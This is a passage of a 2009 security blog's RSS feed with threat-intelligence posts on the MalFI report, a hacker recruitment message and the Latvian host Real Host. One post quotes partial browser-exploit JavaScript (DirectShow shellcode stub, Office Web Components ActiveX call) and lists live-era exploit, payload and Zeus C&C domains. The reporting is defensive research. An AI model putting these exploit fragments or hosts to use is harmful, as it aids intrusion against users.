<td></td>
</tr>
</tbody>
</table>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Introducing MalFI &#8211; Another Report From HostExploit</title>
		<link>http://www.martinsecurity.net/2009/11/17/introducing-malfi-another-report-from-hostexploit/</link>
		<comments>http://www.martinsecurity.net/2009/11/17/introducing-malfi-another-report-from-hostexploit/#comments</comments>
		<pubDate>Wed, 18 Nov 2009 03:33:33 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[hostexploit]]></category>
		<category><![CDATA[lfi]]></category>
		<category><![CDATA[malfi]]></category>
		<category><![CDATA[rfi]]></category>
		<category><![CDATA[xsa]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=424</guid>
		<description><![CDATA[I&#8217;m a few days late for posting this but the HostExploit team has produced another report, this time on an attack dubbed &#8220;MalFI&#8221; for malicious file inclusion. This encompasses remote file inclusion (RFI), local file inclusion (LFI) and Cross Server Attack (XSA). The report had been in the works for quite some time and while [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m a few days late for posting this but the HostExploit team has produced another report, this time on an attack dubbed &#8220;MalFI&#8221; for malicious file inclusion. This encompasses remote file inclusion (RFI), local file inclusion (LFI) and Cross Server Attack (XSA). The report had been in the works for quite some time and while I was not a main author this time, Jart Armin and Scott Logan worked with me to interpret and use my honeypot data that I&#8217;ve been collecting over the last several months.</p>
<p>Rather than rehash the purpose for the report, here&#8217;s an excerpt from the abstract:</p>
<p><strong>MALfi “A Silent Threat”</strong></p>
<p>What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &amp;<br />
Internet servers. One major purpose is to establish, “use once and throw away” disposable<br />
botnets for spam, phishing, DDoS and exploits.<br />
Full Report (public version) download PDF – <a title="hostexploit" href="http://hostexploit.com/" target="_parent">hostexploit</a> Download page = <a href="http://bit.ly/eoO4C">http://bit.ly/eoO4C</a></p>
<p><strong>Abstract / Press Release</strong></p>
<p>MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack<br />
utilized by hackers and cyber criminals to compromise websites and servers. This is<br />
combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack),<br />
and RCE (remote code execution).</p>
<p>Conservative estimates over recent months indicate around 350,000 affected websites and<br />
servers worldwide. <a title="hostexploit" href="http://hostexploit.com/" target="_parent">hostexploit</a> and associated researchers have tracked 103,351 attacks,<br />
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs<br />
involved.</p>
<p>Check out the report for our research and findings. A more detailed version will also be made available to key members of the security and law enforcement communities.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/11/17/introducing-malfi-another-report-from-hostexploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Recruiting Chinese Attackers</title>
		<link>http://www.martinsecurity.net/2009/10/09/recruiting-chinese-attackers/</link>
		<comments>http://www.martinsecurity.net/2009/10/09/recruiting-chinese-attackers/#comments</comments>
		<pubDate>Fri, 09 Oct 2009 15:38:54 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[ghostnet]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=418</guid>
		<description><![CDATA[With all the talk about Chinese malware authors and groups of attackers  supposedly sponsored by governments out there, I thought I would publish a find of mine from back in 2007. Excellent research has been done on this topic with one of the most interesting events being the discovery of GhostNet.
The following message was [...]]]></description>
			<content:encoded><![CDATA[<p>With all the talk about Chinese malware authors and groups of attackers  supposedly sponsored by governments out there, I thought I would publish a find of mine from back in 2007. Excellent research has been done on this topic with one of the most interesting events being the discovery of <a title="GhostNet" href="http://en.wikipedia.org/wiki/GhostNet" target="_blank">GhostNet</a>.</p>
<p>The following message was discovered in a HTML comment section inside a hostile script. I found the page hosting the script by searching for a string inside an ANI exploit on Google in May 2007.</p>
<p>天高云淡，正宜一马奔腾，青春年少，我自纵横驰骋，这是一个只承认强者的时代，然而学习正是赋予了我们作强者的资本，物竟天择，适者生存，只有不断的学习我们才不会被社所会淘汰，我们才会逐渐变强，珍惜你生命中的每一分钟无学习，你会发现平凡的你一样很优秀，当你在风烛残年的那一刻时，面对你的朋友，爱人，儿子，不会因碌碌无为而羞耻，不会因年华虚度而悔恨，你会发现当你,把你的你的青春变的更加劲直和充满活力的时候，曾经无奈与迷茫的你，现在是那样的精彩与辉煌黑域战盟一个，和平，博爱，互助，不会有任何的技术歧视的技术团体，诚心邀请您的加盟楚蓝枫QQ4998XXXXX</p>
<p>This translates  to:</p>
<p><strong><em>It  is a clear day, suitable for horse gallops.  The youth is young; he can advance  freely and quickly.</em></strong></p>
<p><strong><em> </em></strong></p>
<p><strong><em>This  is the era which appreciates only the strong, the survival of the fittest; yet  study is the capital which empowers us to become strong. Only through continuous  learning we will not be eliminated, we will become stronger and stronger.  Cherish every minute of life with learning, you will find yourself as  extraordinary as others. When you become old, in the face of your friends, wife,  son, you will not feel shame and regret because you did not waste time when you  were young; you will find yourself so wonderful when you contributed your  vibrant youth into something meaningful, and changed yourself from once a  helpless and confused you to someone brilliant.QQ4998XXXXX</em></strong></p>
<p>Interesting message they were trying to get across isn&#8217;t it? <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/10/09/recruiting-chinese-attackers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SPAM Briefly Drops 38% Due To Real Host Shutdown</title>
		<link>http://www.martinsecurity.net/2009/09/03/spam-briefly-drops-38-due-to-real-host-shutdown/</link>
		<comments>http://www.martinsecurity.net/2009/09/03/spam-briefly-drops-38-due-to-real-host-shutdown/#comments</comments>
		<pubDate>Thu, 03 Sep 2009 23:12:15 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[cutwail]]></category>
		<category><![CDATA[latvia]]></category>
		<category><![CDATA[real host]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=414</guid>
		<description><![CDATA[MessageLabs wrote a nice report summarizing key events from August and it turns out our work was more widely felt than believed. Apparently part of Cutwail&#8217;s C&#38;C infrastructure resided inside Real Host&#8217;s network. When they got cut off,  SPAM levels dropped but only briefly since there were more C&#38;Cs elsewhere to pick up the [...]]]></description>
			<content:encoded><![CDATA[<p><a title="real host cutwail " href="http://www.messagelabs.com/mlireport/MLIReport_2009.08_Aug_FINAL.pdf" target="_blank">MessageLabs</a> wrote a nice report summarizing key events from August and it turns out our work was more widely felt than believed. Apparently part of Cutwail&#8217;s C&amp;C infrastructure resided inside Real Host&#8217;s network. When they got cut off,  SPAM levels dropped but only briefly since there were more C&amp;Cs elsewhere to pick up the slack.</p>
<p>Here&#8217;s an excerpt from the report, to bad they didn&#8217;t credit our work <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>&#8220;Real Host was disconnected by its upstream providers on 1 August 2009. The impact was immediately felt, as can be seen in Figure 1, where spam volumes dropped briefly by as much as 38% in the subsequent 48-hour period.</p>
<p>Much of this spam was linked to the Cutwail botnet, currently one of the largest botnets and responsible for approximately 15-20% of all spam. Its activity levels fell by as much as 90% when Real Host was taken offline, but quickly recovered in a matter of days.&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/09/03/spam-briefly-drops-38-due-to-real-host-shutdown/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Real Host now shutdown</title>
		<link>http://www.martinsecurity.net/2009/08/05/real-host-now-shutdown/</link>
		<comments>http://www.martinsecurity.net/2009/08/05/real-host-now-shutdown/#comments</comments>
		<pubDate>Wed, 05 Aug 2009 19:48:57 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[hostexploit]]></category>
		<category><![CDATA[junik]]></category>
		<category><![CDATA[latvia]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[rbn]]></category>
		<category><![CDATA[real host]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=412</guid>
		<description><![CDATA[Now that the report has hit mainstream media outlets, I am pleased to report that Real Host has been taken down. Score another one for the good guys!
The story was first published by the Financial Times of London
With follow up stories from:
Network World 
The  Inquirer
CIO  Magazine
Information Security  Magazine
Sunbelt Software
Computer World UK
And many [...]]]></description>
			<content:encoded><![CDATA[<p>Now that the report has hit mainstream media outlets, I am pleased to report that Real Host has been taken down. Score another one for the good guys!</p>
<p>The story was first published by the <a href="http://www.ft.com/cms/s/0/058167ee-8081-11de-bf04-00144feabdc0.html?ftcamp=rss" target="_blank">Financial Times of London</a></p>
<p>With follow up stories from:</p>
<p class="MsoNormal"><a title="network world real host" href="http://www.networkworld.com/news/2009/080509-after-links-to-cybercrime-latvian.html?hpg1=bn" target="_blank"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Network World </span></span></a></p>
<p class="MsoNormal"><a title="the inquirer - real host latvia" href="http://www.theinquirer.net/inquirer/news/1496304/latvian-botnet-host-canned" target="_blank"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">The  Inquirer</span></span></a></p>
<p class="MsoNormal"><a title="cio magzine - real host latvia" href="http://www.cio.com/article/499015/After_Links_to_Cybercrime_Latvian_ISP_is_Cut_Off" target="_blank"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">CIO  Magazine</span></span></a></p>
<p class="MsoNormal"><a title="information security magazine - real host latvia" href="http://www.infosecurity-magazine.com/view/3031/zeus-botnet-traced-to-latvian-operation/" target="_blank"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Information Security  Magazine</span></span></a></p>
<p class="MsoNormal"><a title="sunbelt - real host latvia" href="http://sunbeltblog.blogspot.com/2009/08/telecom-pulls-plug-on-real-host-ltd.html" target="_blank"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Sunbelt</span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"> Software</span></span></a></p>
<p class="MsoNormal"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><a title="computerworld - real host latvia" href="http://www.computerworlduk.com/technology/internet/web2/news/index.cfm?newsid=16074&amp;tsb=share" target="_blank">Computer World UK</a></span></span></p>
<p class="MsoNormal"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">And many more!<br />
</span></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/08/05/real-host-now-shutdown/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Real Host, Latvia &#8211; RBN Resurgence or Clone</title>
		<link>http://www.martinsecurity.net/2009/07/31/real-host-latvia-rbn-resurgence-or-clone/</link>
		<comments>http://www.martinsecurity.net/2009/07/31/real-host-latvia-rbn-resurgence-or-clone/#comments</comments>
		<pubDate>Fri, 31 Jul 2009 16:05:01 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[banking trojan]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[moneymule]]></category>
		<category><![CDATA[ninebal]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[realhost]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=378</guid>
		<description><![CDATA[A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (Part 1 &#124; Part 2)
The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There [...]]]></description>
			<content:encoded><![CDATA[<p>A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (<a title="nine ball attack follow up 1" href="http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/" target="_blank">Part 1</a> | <a class="wpGallery" title="nine ball attack follow up 2" href="http://www.martinsecurity.net/2009/07/29/nine-ball-followup-now-with-video-part-2/" target="_blank">Part 2</a>)</p>
<p>The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There are 2 payloads dropped on compromised hosts at the end of the attacks that steal banking credentials and send SPAM. These payloads are delivered by multiple exploits including  an unpatched 0day vulnerability and a previously unpatched one.</p>
<p>Directshow &#8211; MS09-028 (previously a 0day, patched recently)</p>
<p>function directshow()<br />
{<br />
var shellcode=unescape(&#8221;%uC033&#8230;.</p>
<p>obj.data=&#8217;./directshow.php&#8217;;<br />
obj.classid=&#8217;clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF&#8217;;</p>
<p>Microsoft Office Web Components (unpatched 0day)</p>
<p>function spreadsheet()<br />
{<br />
try<br />
{<br />
var objspread=new ActiveXObject(&#8217;OWC10.Spreadsheet&#8217;);<br />
}</p>
<p>After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia it quickly became apparent how bad this host is. A quick search leads to a blog <a title="dynamoo blog" href="http://www.dynamoo.com/blog/2009/07/real-host-ltd-is-real-sewer.html" target="_blank">written by Dynamoo</a> where the activities of this host are first uncovered. Delving deeper into this provider  it is  apparent that they are a major hub of cybercrime activity which we will discuss further. This post has been prepared in conjunction with Jart Armin from <a title="hostexploit" href="http://hostexploit.com" target="_blank">HostExploit.com</a>. Jart will present a higher level view of Real Host&#8217;s activities in relation to other entities and most interestingly how they related to the former Russian Business Network (RBN).</p>
<p>It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.</p>
<p>Observed Hostile Activity:</p>
<ul>
<li>Exploits including unpatched (or soon to be patched) 0days</li>
<li>Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan</li>
<li>Phishing sites</li>
<li>Moneymule recruitment sites</li>
<li>Botnet Command and Control servers</li>
<li>Hosting of cybercrime websites &#8211; Iframe programs</li>
<li>Distributing licensed software (Warez)</li>
</ul>
<p>Real Host has 3 /28 IP blocks (48 IPs) that they get from  Junik (AS8206), these are:</p>
<p>inetnum: 213.182.197.0 &#8211; 213.182.197.15<br />
netname: Real_Host_NET3<br />
descr: Real Host<br />
country: LV<br />
abuse-mailbox: abuseemaildhcp@gmail.com</p>
<p>inetnum: 213.182.197.224 &#8211; 213.182.197.239<br />
netname: Real_Host_NET1<br />
descr: Real Host<br />
country: LV<br />
abuse-mailbox: abuseemaildhcp@gmail.com</p>
<p>inetnum: 213.182.197.240 &#8211; 213.182.197.255<br />
netname: Real_Host_NET2<br />
descr: Real Host<br />
country: LV<br />
abuse-mailbox: abusemailhost@gmail.com</p>
<p>The first indication of suspicious activity is the use of gmail addresses as abuse contacts.</p>
<p>Next, here is data from my security tools showing attacks and the dates associated with them:</p>
<table style="border-collapse: collapse; width: 463pt;" border="0" cellspacing="0" cellpadding="0" width="616">
<col style="width: 48pt;" width="64"></col>
<col style="width: 78pt;" width="104"></col>
<col style="width: 149pt;" width="198"></col>
<col style="width: 110pt;" width="146"></col>
<col style="width: 78pt;" width="104"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 48pt;" width="64" height="17">Date</td>
<td style="width: 78pt;" width="104">IP</td>
<td style="width: 149pt;" width="198">Domain</td>
<td style="width: 110pt;" width="146">URL</td>
<td style="width: 78pt;" width="104">Purpose</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">5/6/2009</td>
<td>213.182.197.230</td>
<td>update.dom11z.cn</td>
<td>/</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/2/2009</td>
<td>213.182.197.227</td>
<td>test.corbsc.com</td>
<td>/splt/getpdf.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/4/2009</td>
<td>213.182.197.229</td>
<td>2k90.cn</td>
<td>/2/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/5/2009</td>
<td>213.182.197.229</td>
<td>2k90.cn</td>
<td>/2/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/10/2009</td>
<td>213.182.197.237</td>
<td>downloadoemsoftware.com</td>
<td>/exempl/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/15/2009</td>
<td>213.182.197.237</td>
<td>downloadoemsoftware.com</td>
<td>/exempl/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/10/2009</td>
<td>213.182.197.237</td>
<td>noplit.ws</td>
<td>/exempl/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/10/2009</td>
<td>213.182.197.229</td>
<td>businessconsulting312.com</td>
<td>/bus_trf/1/pdf.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/10/2009</td>
<td>213.182.197.229</td>
<td>businessconsulting312.com</td>
<td>/bus_trf/1/pdf.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">5/6/2009</td>
<td>213.182.197.23</td>
<td>lieliteautobody.cn</td>
<td>/load.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">5/6/2009</td>
<td>213.182.197.23</td>
<td>lieliteautobody.cn</td>
<td>/load.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/2/2009</td>
<td>213.182.197.227</td>
<td>test.corbsc.com</td>
<td>/splt/getexe.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/6/2009</td>
<td>213.182.197.5</td>
<td>virus-detect-soft.com</td>
<td>/antivirus.exe</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/6/2009</td>
<td>213.182.197.5</td>
<td>virus-detect-soft.com</td>
<td>/antivirus.exe</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/10/2009</td>
<td>213.182.197.237</td>
<td>downloadoemsoftware.com</td>
<td>/exempl/load.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/18/2009</td>
<td>213.182.197.237</td>
<td>5fgh.ws</td>
<td>/expli/update.php</td>
<td>Payloads</td>
</tr>
</tbody>
</table>
<p>A little manual investigation led me to the following:</p>
<table style="border-collapse: collapse; width: 415pt;" border="0" cellspacing="0" cellpadding="0" width="552">
<col style="width: 78pt;" width="104"></col>
<col style="width: 149pt;" width="198"></col>
<col style="width: 110pt;" width="146"></col>
<col style="width: 78pt;" width="104"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt; width: 78pt;" width="104" height="17">IP</td>
<td class="xl24" style="width: 149pt;" width="198">Domain</td>
<td class="xl24" style="width: 110pt;" width="146">Purpose</td>
<td class="xl24" style="width: 78pt;" width="104">More Information</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17">213.182.197.229</td>
<td class="xl24">yourgoogleanalytics.us</td>
<td class="xl24">Money Mule Recruiting<span> </span></td>
<td class="xl24"><a href="http://forums.layonara.com/just-fun/233792-oh-those-wacky-scam-artists.html" target="_blank">Link</a></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17">213.182.197.229</td>
<td class="xl24">barwellsgroup.cn</td>
<td class="xl24">Money Mule Recruiting<span> </span></td>
<td class="xl24">Related to above</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl25" style="height: 12.75pt;" height="17">213.182.197.249</td>
<td class="xl24">Vikd3jj-3.com</td>
<td class="xl24">Malware</td>
<td class="xl24"></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl25" style="height: 12.75pt;" height="17">213.182.197.251</td>
<td class="xl24">2k90.cn</td>
<td class="xl24">malware</td>
<td class="xl24"></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl25" style="height: 12.75pt;" height="17">213.182.197.13</td>
<td class="xl24">Mac-videos.com</td>
<td class="xl24">Mac Trojan</td>
<td class="xl24"><a href="http://www.macfixitforums.com/ubbthreads.php/topics/474209/2/Google_Hijacked" target="_blank">Link</a></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17">213.182.197.236</td>
<td class="xl24">71speed.info</td>
<td class="xl24" colspan="2">Leads to Banking Trojan &#8211;   Silent Banker &amp; Spambot</td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.8</td>
<td class="xl26">bestxvids.info</td>
<td class="xl24">zlob</td>
<td class="xl24"><a href="http://myitforum.com/cs2/blogs/cmosby/archive/2008/06/17/malicious-doorways-redirecting-to-malware-dancho-danchev-s-blog-mind-streams-of-information-security-knowledge.aspx" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.249</td>
<td class="xl26">traffic-searches.cn</td>
<td class="xl26">botnet C&amp;C</td>
<td class="xl24"><a href="http://www.malwareurl.com/listing.php?domain=traffic-searches.cn" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.237</td>
<td class="xl26">1gigabayt.com</td>
<td class="xl24">Zeus C&amp;C</td>
<td class="xl24"><a href="https://zeustracker.abuse.ch/monitor.php?host=1gigabayt.com" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.14</td>
<td class="xl26">iframepartners.com</td>
<td class="xl24">iframe sellers</td>
<td></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20"><span> </span>213.182.197.228</td>
<td class="xl26">Chlenopopik.com</td>
<td class="xl24">Zeus C&amp;C</td>
<td><a href="https://zeustracker.abuse.ch/monitor.php?host=chlenopopik.com" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.14</td>
<td class="xl26">Megavipsite.cn</td>
<td>malware</td>
<td><a href="http://www.threatexpert.com/report.aspx?md5=d49779060bc9f04140d3a22ffe555951" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.20</td>
<td class="xl26">Traffcount.cn</td>
<td>malware</td>
<td><a href="http://www.honeynet.cz/domains/malicious.txt" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.229</td>
<td class="xl26">Newskyag.com</td>
<td>Money Mule Recruiting<span> </span></td>
<td><a href="http://answers.yahoo.com/question/index?qid=20070912090147AAqz16y" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20"></td>
<td></td>
<td>Zeus C&amp;C</td>
<td><a href="https://zeustracker.abuse.ch/monitor.php?host=newskyag.com" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.235</td>
<td class="xl26">Traffic-exchange.ru</td>
<td>Part of iframe redirection service</td>
<td><a href="http://www.islandcrisis.net/2009/05/mygenerim-redirecting-spy-site-from-facebook/" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.10</td>
<td class="xl26">vlkontacte.ru</td>
<td colspan="2">Russian Social Network Phish</td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.251</td>
<td class="xl26">Botnet.su</td>
<td>Zeus C&amp;C</td>
<td><a href="https://zeustracker.abuse.ch/monitor.php?host=botnet.su" target="_blank">Link</a></td>
</tr>
</tbody>
</table>
<p>The domain I found most amusing was botnet.su, the attackers clearly aren&#8217;t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.</p>
<p>Zeus seems to be one of the most common threats being hosted from Real Host&#8217;s network. According to <a title="top 10 botnets" href="http://www.networkworld.com/news/2009/072209-botnets.html" target="_blank">recent information</a> released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.</p>
<p>To begin, let&#8217;s look at the money mule sites the Barwells Group and NewskyAG, here is an excerpt from the link included above:</p>
<p>BarwellsGroup</p>
<p>&#8220;During the trial period (1 month), you will be paid 2000 USD per month<br />
while  working  on  average  3  hours  per day, Monday-Friday, plus 5<br />
commission from every transactions or task received and processed. The<br />
salary  will  be  sent  in  the form of wire transfer directly to your<br />
account.  After  the  trial  period your base pay salary will go up to<br />
3,500USD per month, plus 5 commission.&#8221;</p>
<p>Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!</p>
<p>NewskyAG</p>
<p>Not only does this domain operate a money mule scam, it also ran a Zeus C&amp;C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:</p>
<p>Q: &#8220;Anyone ever heard of a company called NewSky Ag?&#8221;</p>
<p>A: &#8220;Yes I work for them from home and so far everything is ok but I&#8217;ve only been doing it about 2 months so if you have any more ? please let me know&#8221;</p>
<p>Next we have a phish for a Russian social networking site</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/phish.png"></a><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/phish2.png"><img class="alignnone size-medium wp-image-388" title="phish2" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/phish2-300x281.png" alt="phish2" width="300" height="281" /></a></p>
<p>Lastly lets look at iframepartners.com, the site is currently down however information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:</p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>1.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">A partner pays for iframe traffic,  we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K  depending on traffic quality</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>2.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">We accept only ads that generate  more that 50K USA  traffic</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>3.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">You are prohibited to install  anything else with our iframe</span></span></p>
